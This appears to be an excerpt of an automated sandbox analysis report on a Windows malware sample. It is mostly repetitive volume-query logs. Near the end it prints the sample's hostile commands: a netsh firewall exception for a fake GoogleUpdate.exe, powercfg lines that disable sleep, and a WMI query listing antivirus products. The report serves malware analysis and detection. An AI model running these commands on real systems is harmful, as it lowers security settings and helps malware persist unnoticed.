Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: unknown VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

Code function: 0_2_00408AAC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00408AAC

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

Code function: 0_2_0040FCE0 RegCreateKeyA,RegSetValueA,GetUserNameA,RegCloseKey,RegOpenKeyExA,AdjustTokenPrivileges,LookupPrivilegeValueA,OpenProcessToken,RegQueryValueExA,RegDeleteKeyA,

0_2_0040FCE0

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\GoogleUpdate.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

Modifies the windows firewall

Source: C:\Windows\GoogleUpdate.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
